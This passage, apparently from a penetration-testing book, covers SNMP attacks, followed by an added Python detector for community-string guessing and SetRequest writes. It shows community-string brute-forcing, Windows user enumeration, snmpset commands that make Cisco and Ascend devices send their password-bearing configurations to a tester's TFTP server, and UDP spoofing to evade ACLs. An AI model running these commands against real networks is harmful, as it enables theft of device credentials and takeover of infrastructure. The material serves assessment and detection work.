The Simple Network Management Protocol (SNMP) service listens on UDP port 161. SNMP is often found running on network infrastructure devices such as managed switches, routers, and other appliances. Increasingly, SNMP can be found running on Unix-based and Windows servers for central network management purposes. SNMP authentication is very simple and is sent across networks in plaintext. SNMP Management Information Base (MIB) data can be retrieved from a device by specifying the correct read community string, and SNMP MIB data can be written to a device using the correct write community string. MIB databases contain listings of Object Identifier (OID) values, such as routing table entries, network statistics, and details of network interfaces. Accessing a router MIB is useful when performing further network reconnaissance and mapping. Two useful tools used by attackers and security consultants alike for brute-forcing SNMP community strings and accessing MIB databases are ADMsnmp and snmpwalk.

5.6.1 ADMsnmp

ADMsnmp is available from the ADM group home page at http://adm.freelsd.net/ADM/. The utility is an effective Unix command-line SNMP community string brute-force utility. Example 5-13 shows the tool in use against a Cisco router at 192.168.0.1 to find that the community string private has write access.

Example 5-13. ADMsnmp used to brute-force SNMP community strings

    # ADMsnmp 192.168.0.1
    ADMsnmp vbeta 0.1 (c) The ADM crew
    ftp://ADM.isp.at/ADM/
    greets: !ADM, el8.org, ansia
    >>>>>>>>>>> get req name=root id = 2 >>>>>>>>>>>
    >>>>>>>>>>> get req name=public id = 5 >>>>>>>>>>>
    >>>>>>>>>>> get req name=private id = 8 >>>>>>>>>>>
    >>>>>>>>>>> get req name=write id = 11 >>>>>>>>>>>
    <<<<<<<<<<< recv snmpd paket id = 9 name = private ret =0 <<<<<<<<<
    >>>>>>>>>>>> send setrequest id = 9 name = private >>>>>>>>
    >>>>>>>>>>> get req name=admin id = 14 >>>>>>>>>>>
    <<<<<<<<<<< recv snmpd paket id = 10 name = private ret =0 <<<<<<<<
    >>>>>>>>>>> get req name=proxy id = 17 >>>>>>>>>>>
    <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<
    >>>>>>>>>>> get req name=ascend id = 20 >>>>>>>>>>>
    <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<
    >>>>>>>>>>> get req name=cisco id = 23 >>>>>>>>>>>
    >>>>>>>>>>> get req name=router id = 26 >>>>>>>>>>>
    >>>>>>>>>>> get req name=shiva id = 29 >>>>>>>>>>>
    >>>>>>>>>>> get req name=all private id = 32 >>>>>>>>>>>
    >>>>>>>>>>> get req name= private id = 35 >>>>>>>>>>>
    >>>>>>>>>>> get req name=access id = 38 >>>>>>>>>>>
    >>>>>>>>>>> get req name=snmp id = 41 >>>>>>>>>>>
    <!ADM!> snmp check on pipex-gw.trustmatta.com <!ADM!>
    sys.sysName.0:pipex-gw.trustmatta.com
    name = private write access

5.6.2 snmpwalk

The snmpwalk utility is part of the Net-SNMP (previously UCD-SNMP) suite of tools available from http://net-snmp.sourceforge.net. The Net-SNMP toolkit can be built on both Unix and Windows platforms and contains other useful utilities including snmpset, which can modify and set specific OID values. snmpwalk is used with a valid community string to download the entire MIB database from the target device (unless a specific OID value to walk is provided by the user). Example 5-14 shows snmpwalk being used to download the MIB database from a Cisco router. The MIB in this example is over seven pages in length, so for brevity, only the first eight OID values are presented here.

Example 5-14. Accessing the MIB using snmpwalk

    # snmpwalk -c public 192.168.0.1
    system.sysDescr.0 = Cisco Internetwork Operating System Software
    IOS (tm) C2600 Software (C2600-IS-M), Version 12.0(6), RELEASE SOFTWARE (fc1)
    Copyright (c) 1986-1999 by cisco Systems, Inc.
    Compiled Wed 11-Aug-99 00:16 by phanguye
    system.sysObjectID.0 = OID: enterprises.9.1.186
    system.sysUpTime.0 = Timeticks: (86128) 0:14:21.28
    system.sysContact.0 =
    system.sysName.0 = pipex-gw.trustmatta.com
    system.sysLocation.0 =
    system.sysServices.0 = 78
    system.sysORLastChange.0 = Timeticks: (0) 0:00:00.00

5.6.3 Default Community Strings

Most routers, switches, and wireless access points from Cisco, 3Com, Foundry, D-Link, and other companies use public and private as their respective default read and write SNMP community strings. The community string list provided with the ADMsnmp brute-force program includes cisco, router, enable, admin, read, write, and other obvious values. When assessing routers or devices belonging to a specific organization, you should tailor your list accordingly (including the company name and other values that may be used in that instance).
5.6.4 Compromising Devices by Reading from SNMP

Many Windows NT and 2000 servers run SNMP services, using the community string of public for read access. By walking through the 1.3.6.1.4.1.77.1.2.25 OID within a Windows NT or 2000 server, you can enumerate usernames of active accounts on the target host; 192.168.0.251 is used in Example 5-15.

Example 5-15. Enumerating Windows 2000 user accounts through SNMP

    # snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25
    enterprises.77.1.2.25.1.1.101.115.115 = "Chris"
    enterprises.77.1.2.25.1.1.65.82.84.77.65.78 = "IUSR_CARTMAN"
    enterprises.77.1.2.25.1.1.65.82.84.77.65.78 = "IWAM_CARTMAN"
    enterprises.77.1.2.25.1.1.114.97.116.111.114 = "Administrator"
    enterprises.77.1.2.25.1.1.116.85.115.101.114 = "TsInternetUser"
    enterprises.77.1.2.25.1.1.118.105.99.101.115 = "NetShowServices"

In this example, the usernames Chris and Administrator are identified, along with the built-in Windows IUSR_hostname, IWAM_hostname, TsInternetUser, and NetShowServices users.
SNMP OID values can be fed to tools such as snmpwalk in both numerical and word form. Table 5-2 lists values that are useful when enumerating services and open shares of Windows NT family servers found running SNMP.
5.6.5 Compromising Devices by Writing to SNMP

It is possible to compromise a Cisco IOS or Ascend device running SNMP if you have write access to the SNMP MIB. By first running a TFTP server on an accessible host, you can modify particular OID values on the target device over SNMP (using snmpset), so that the device configuration file containing direct access passwords can be uploaded through TFTP. Here are some examples of this attack against Cisco IOS and Ascend network devices.

Compromising a Cisco device using snmpset:

    # snmpset -r 3 -t 3 192.168.0.1 private .1.3.6.1.4.1.9.2.1.55.192.\
    168.0.50 s "cisco-config"

Compromising an Ascend device using snmpset:

    # snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.3.0\
    a "192.168.0.50"
    # snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.4.0\
    s "ascend-config"

For these attacks to work, you must install and configure an accessible TFTP server to which the appliance can upload its configuration file. This can be achieved from a Unix-based platform by modifying the /etc/inetd.conf file to run tftpd from inetd, or by using a Windows TFTP server, such as the Cisco TFTP Server (available from http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp). One key point to remember when performing this exploit is to ensure your TFTP server is writable so that the target device can upload its configuration file!

SNMP running on hardware appliances can be imaginatively abused by writing to a plethora of different OID values (e.g., modification of routing tables or uploading new firmware and configuration files). It is often best to test SNMP attacks in a lab environment before performing them on live networks, to avoid crashing routers, switches, and other critical infrastructure devices.

A damaging extension to attacks involving writing to remote devices via SNMP is to use UDP spoofing. If the SNMP service listening on the target router doesn't respond to packets sent from the attacker's Internet-based hosts, he can spoof the snmpset command string (as in the previous command-line examples) to appear from a trusted host, such as an external firewall IP address. Obviously, he would need to find the correct community string, but it certainly is an imaginative way around the host-based ACLs of the router.

5.6.6 SNMP Process-Manipulation Vulnerabilities

SNMP services running as part of Compaq Insight Manager, and various firmware found running on hardware such as Linksys routers and Compaq and ORiNOCO wireless access points, are publicly known to be vulnerable to various simple and complex process-manipulation attacks. In February 2002, CERT issued an advisory detailing multiple vulnerabilities in many SNMP implementations, accessible at http://www.cert.org/advisories/CA-2002-03.html. On Solaris and other Unix-based platforms at least, these vulnerabilities resulted in actual compromises. Many operating systems and software suites were affected, including systems from the following vendors:
For current information relating to known SNMP issues, search the MITRE CVE list or check sites such as CERT or ISS X-Force. At the time of writing, the CERT knowledge base at http://www.kb.cert.org/vuls/ lists several remotely exploitable vulnerabilities in SNMP (not including denial of service or locally exploitable bugs), as shown in Table 5-3.
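Both the community-string guessing of Section 5.6.1 and the snmpset writes of Section 5.6.5 travel as plaintext SNMPv1 datagrams, so anyone watching UDP port 161 can see the community strings and the PDU types on the wire. The following Python is an added example, not code from the book or from the Net-SNMP or ADM projects: it decodes the community string and PDU type from raw datagrams with a minimal BER reader, then flags sources that cycle through several community strings or send a SetRequest. The sample traffic, the 10.0.0.x source addresses and the threshold of three strings are constructed for the example.

```python
from collections import defaultdict
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse", 0xA3: "SetRequest"}

def _tlv(buf, pos):
    """Read one BER tag/length/value triple; returns (tag, value_bytes, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length: next n bytes hold the length
        n, length = length & 0x7F, 0
        for _ in range(n):
            length, pos = (length << 8) | buf[pos], pos + 1
    return tag, buf[pos:pos + length], pos + length

def parse_snmpv1(datagram):
    """Return version, plaintext community, PDU type and request-id of an SNMPv1/v2c message."""
    tag, msg, _ = _tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message (outer SEQUENCE missing)")
    _, ver, p = _tlv(msg, 0)               # INTEGER version (0 = v1, 1 = v2c)
    _, community, p = _tlv(msg, p)         # OCTET STRING community, sent in the clear
    pdu_tag, pdu, _ = _tlv(msg, p)         # context-specific tag selects the PDU type
    _, req_id, _ = _tlv(pdu, 0)
    return {"version": int.from_bytes(ver, "big"), "community": community.decode("latin-1"),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)), "request_id": int.from_bytes(req_id, "big")}

def build_request(community, pdu_tag=0xA0, request_id=1):
    """Encode a one-varbind v1 request for sysDescr.0 (constructed test traffic; request_id < 128)."""
    varbind = b"\x30\x0c\x06\x08\x2b\x06\x01\x02\x01\x01\x01\x00\x05\x00"  # OID 1.3.6.1.2.1.1.1.0, NULL
    pdu = bytes([0x02, 1, request_id]) + b"\x02\x01\x00\x02\x01\x00" + bytes([0x30, len(varbind)]) + varbind
    body = b"\x02\x01\x00" + bytes([0x04, len(community)]) + community.encode() + bytes([pdu_tag, len(pdu)]) + pdu
    return bytes([0x30, len(body)]) + body

def flag_sources(datagrams, guess_threshold=3):
    """Map source -> findings: several distinct community strings (guessing) or any SetRequest (write)."""
    communities, writers = defaultdict(set), set()
    for src, data in datagrams:
        hdr = parse_snmpv1(data)
        communities[src].add(hdr["community"])
        if hdr["pdu"] == "SetRequest":
            writers.add(src)
    findings = {}
    for src, seen in communities.items():
        reasons = ["%d community strings tried" % len(seen)] if len(seen) >= guess_threshold else []
        reasons += ["SetRequest seen"] if src in writers else []
        if reasons:
            findings[src] = reasons
    return findings

# Constructed traffic: a normal poller, and a host cycling ADMsnmp-style defaults before writing with "private"
SAMPLE = [("10.0.0.5", build_request("public")), ("10.0.0.9", build_request("private", 0xA3, 9))]
SAMPLE += [("10.0.0.9", build_request(c, request_id=i)) for i, c in enumerate(["public", "private", "cisco", "router"], 1)]
```

Feeding real captures requires only the UDP payloads (for example, exported from a packet capture) in place of the constructed SAMPLE list; SNMPv3 messages use a different outer structure and are reported as a non-SNMPv1 header rather than decoded.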